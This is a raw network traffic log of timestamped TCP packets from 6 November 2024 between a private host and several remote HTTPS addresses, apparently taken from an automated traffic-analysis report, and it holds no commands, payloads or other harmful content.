                                                                                                                                              Nov 6, 2024 16:56:04.715616941 CET49868443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:04.715650082 CET44349868188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:04.716667891 CET44349868188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:04.716738939 CET49868443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:04.717684984 CET49868443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:04.717684984 CET49868443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:04.717750072 CET44349868188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:04.717919111 CET44349868188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:04.718003988 CET49868443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:04.718003988 CET49868443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:04.718015909 CET44349868188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:04.718170881 CET49868443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:04.718170881 CET49868443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:04.720525026 CET49877443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:04.720557928 CET44349877188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:04.720700979 CET49877443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:04.720943928 CET49877443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:04.720958948 CET44349877188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:04.779110909 CET44349867188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:04.779397964 CET49867443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:04.779427052 CET44349867188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:04.780495882 CET44349867188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:04.780558109 CET49867443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:04.780880928 CET49867443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:04.780920982 CET49867443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:04.780936003 CET44349867188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:04.780999899 CET49867443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:04.781012058 CET44349867188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:04.781024933 CET49867443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:04.781059027 CET49867443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:04.781418085 CET49878443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:04.781451941 CET44349878188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:04.781516075 CET49878443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:04.781886101 CET49878443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:04.781897068 CET44349878188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:04.839921951 CET44349869188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:04.840293884 CET49869443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:04.840322018 CET44349869188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:04.841352940 CET44349869188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:04.841428041 CET49869443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:04.841763020 CET49869443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:04.841810942 CET44349869188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:04.841881990 CET49869443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:04.841891050 CET44349869188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:04.855307102 CET44349870188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:04.855814934 CET49870443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:04.855830908 CET44349870188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:04.856864929 CET44349870188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:04.856936932 CET49870443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:04.857305050 CET49870443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:04.857355118 CET44349870188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:04.857500076 CET49870443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:04.857506037 CET44349870188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:04.867355108 CET44349871188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:04.867599010 CET49871443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:04.867614031 CET44349871188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:04.868603945 CET44349871188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:04.868673086 CET49871443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:04.869014025 CET49871443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:04.869066000 CET44349871188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:04.869188070 CET49871443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:04.869194984 CET44349871188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:04.896014929 CET49869443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:04.906065941 CET44349872188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:04.906455994 CET49872443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:04.906487942 CET44349872188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:04.907530069 CET44349872188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:04.907594919 CET49872443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:04.907948971 CET49872443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:04.908010006 CET44349872188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:04.908130884 CET49872443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:04.908140898 CET44349872188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:04.912004948 CET49870443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:04.912365913 CET49871443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:04.959017038 CET49872443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:05.004935980 CET44349873188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:05.005484104 CET49873443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:05.005503893 CET44349873188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:05.006536007 CET44349873188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:05.006699085 CET49873443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:05.006906986 CET49873443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:05.006920099 CET49873443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:05.006961107 CET44349873188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:05.006984949 CET49873443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:05.007011890 CET49873443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:05.007421017 CET49879443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:05.007453918 CET44349879188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:05.007575989 CET49879443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:05.007874012 CET49879443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:05.007883072 CET44349879188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:05.166786909 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:05.166870117 CET49874443192.168.2.1813.107.246.45
                                                                                                                                              Nov 6, 2024 16:56:05.168767929 CET49874443192.168.2.1813.107.246.45
                                                                                                                                              Nov 6, 2024 16:56:05.168781042 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:05.169034958 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:05.170500994 CET49874443192.168.2.1813.107.246.45
                                                                                                                                              Nov 6, 2024 16:56:05.215328932 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:05.227627993 CET44349875188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:05.227962017 CET49875443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:05.227989912 CET44349875188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:05.230420113 CET44349875188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:05.230509996 CET49875443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:05.230863094 CET49875443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:05.231070042 CET49875443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:05.231076956 CET44349875188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:05.231107950 CET44349875188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:05.246357918 CET44349876188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:05.246673107 CET49876443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:05.246687889 CET44349876188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:05.247761011 CET44349876188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:05.247850895 CET49876443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:05.248284101 CET49876443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:05.248352051 CET44349876188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:05.248507023 CET49876443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:05.248514891 CET44349876188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:05.273603916 CET44349870188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:05.273714066 CET44349870188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:05.273875952 CET49870443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:05.274772882 CET49870443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:05.274791956 CET44349870188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:05.278029919 CET49875443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:05.278060913 CET44349875188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:05.282756090 CET49880443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:05.282799006 CET44349880188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:05.283063889 CET49880443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:05.283350945 CET49880443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:05.283363104 CET44349880188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:05.288240910 CET49876443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:05.325037003 CET44349877188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:05.325370073 CET49877443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:05.325388908 CET44349877188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:05.326000929 CET49875443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:05.326807022 CET44349877188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:05.326975107 CET49877443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:05.327337027 CET49877443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:05.327536106 CET49877443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:05.327544928 CET44349877188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:05.327897072 CET44349877188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:05.373366117 CET44349871188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:05.373469114 CET44349871188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:05.373538971 CET49871443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:05.374023914 CET49877443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:05.374043941 CET44349877188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:05.374664068 CET49871443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:05.374695063 CET44349871188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:05.378685951 CET44349869188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:05.378798962 CET44349869188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:05.378840923 CET49869443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:05.379493952 CET49869443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:05.379513979 CET44349869188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:05.395941973 CET44349872188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:05.395987988 CET44349872188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:05.396050930 CET44349872188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:05.396068096 CET49872443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:05.396095037 CET44349872188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:05.396132946 CET44349872188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:05.396136999 CET49872443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:05.396147013 CET44349872188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:05.396186113 CET49872443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:05.396193027 CET44349872188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:05.396234989 CET44349872188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:05.396275997 CET49872443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:05.396282911 CET44349872188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:05.402208090 CET44349878188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:05.402466059 CET49878443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:05.402479887 CET44349878188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:05.403563976 CET44349878188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:05.403635979 CET49878443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:05.403958082 CET49878443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:05.404020071 CET44349878188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:05.404141903 CET49878443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:05.404148102 CET44349878188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:05.409286022 CET44349842188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:05.409435034 CET44349842188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:05.409488916 CET49842443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:05.410252094 CET49842443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:05.410268068 CET44349842188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:05.413542032 CET49881443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:05.413577080 CET44349881188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:05.413784981 CET49881443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:05.414098978 CET49881443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:05.414110899 CET44349881188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:05.421134949 CET49877443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:05.437074900 CET49872443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:05.437104940 CET44349872188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:05.452018023 CET49878443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:05.484050035 CET49872443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:05.514736891 CET44349872188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:05.514834881 CET44349872188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:05.514880896 CET44349872188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:05.514885902 CET49872443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:05.514919043 CET44349872188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:05.514954090 CET44349872188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:05.514985085 CET49872443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:05.514986038 CET44349872188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:05.514998913 CET44349872188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:05.515024900 CET49872443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:05.515650034 CET44349872188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:05.515707970 CET49872443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:05.515722036 CET44349872188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:05.515878916 CET44349872188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:05.515955925 CET44349872188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:05.515973091 CET49872443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:05.516046047 CET49872443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:05.516490936 CET49872443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:05.516510963 CET44349872188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:05.519902945 CET49882443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:05.519942045 CET44349882188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:05.520035982 CET49882443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:05.520404100 CET49882443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:05.520423889 CET44349882188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:05.614923000 CET44349879188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:05.615344048 CET49879443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:05.615365028 CET44349879188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:05.615701914 CET44349879188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:05.616023064 CET49879443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:05.616103888 CET44349879188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:05.616238117 CET49879443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:05.622194052 CET44349876188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:05.622276068 CET44349876188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:05.622406960 CET44349876188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:05.622437000 CET44349876188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:05.622462988 CET44349876188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:05.622476101 CET49876443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:05.622489929 CET44349876188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:05.622503996 CET49876443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:05.622531891 CET49876443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:05.622812986 CET44349876188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:05.623502970 CET44349876188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:05.623560905 CET44349876188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:05.623614073 CET49876443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:05.623794079 CET49876443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:05.623811960 CET44349876188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:05.659332037 CET44349879188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:05.709786892 CET44349875188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:05.709897041 CET44349875188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:05.709980965 CET49875443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:05.710887909 CET49875443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:05.710903883 CET44349875188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:05.711354971 CET49883443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:05.711391926 CET44349883188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:05.711833954 CET49883443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:05.712277889 CET49883443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:05.712291956 CET44349883188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:05.799654007 CET44349877188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:05.799720049 CET44349877188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:05.799755096 CET44349877188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:05.799788952 CET44349877188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:05.799796104 CET49877443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:05.799810886 CET44349877188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:05.799827099 CET49877443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:05.799916029 CET44349877188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:05.799957037 CET44349877188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:05.800024986 CET49877443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:05.800033092 CET44349877188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:05.800071001 CET44349877188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:05.800105095 CET49877443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:05.800188065 CET49877443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:05.801089048 CET49877443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:05.801110029 CET44349877188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:05.887995005 CET44349880188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:05.888484955 CET49880443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:05.888501883 CET44349880188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:05.889584064 CET44349880188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:05.889698982 CET49880443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:05.890254974 CET49880443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:05.890324116 CET49880443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:05.890325069 CET44349880188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:05.890404940 CET49880443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:05.890481949 CET49880443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:05.891005039 CET49884443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:05.891037941 CET44349884188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:05.891275883 CET49884443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:05.891503096 CET49884443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:05.891514063 CET44349884188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:05.902585030 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:05.902614117 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:05.902630091 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:05.902733088 CET49874443192.168.2.1813.107.246.45
                                                                                                                                              Nov 6, 2024 16:56:05.902776957 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:05.902842999 CET49874443192.168.2.1813.107.246.45
                                                                                                                                              Nov 6, 2024 16:56:05.903809071 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:05.903827906 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:05.903898001 CET49874443192.168.2.1813.107.246.45
                                                                                                                                              Nov 6, 2024 16:56:05.903911114 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:05.903923035 CET49874443192.168.2.1813.107.246.45
                                                                                                                                              Nov 6, 2024 16:56:05.903969049 CET49874443192.168.2.1813.107.246.45
                                                                                                                                              Nov 6, 2024 16:56:05.927004099 CET44349878188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:05.927047968 CET44349878188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:05.927081108 CET44349878188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:05.927107096 CET44349878188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:05.927119017 CET49878443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:05.927136898 CET44349878188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:05.927175045 CET49878443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:05.927179098 CET44349878188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:05.927223921 CET49878443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:05.927231073 CET44349878188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:05.927418947 CET44349878188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:05.927601099 CET49878443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:05.927608013 CET44349878188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:05.931880951 CET44349878188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:05.932169914 CET49878443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:05.932182074 CET44349878188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:05.977041006 CET49878443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:06.018222094 CET44349881188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.018584013 CET49881443192.168.2.18188.114.96.3
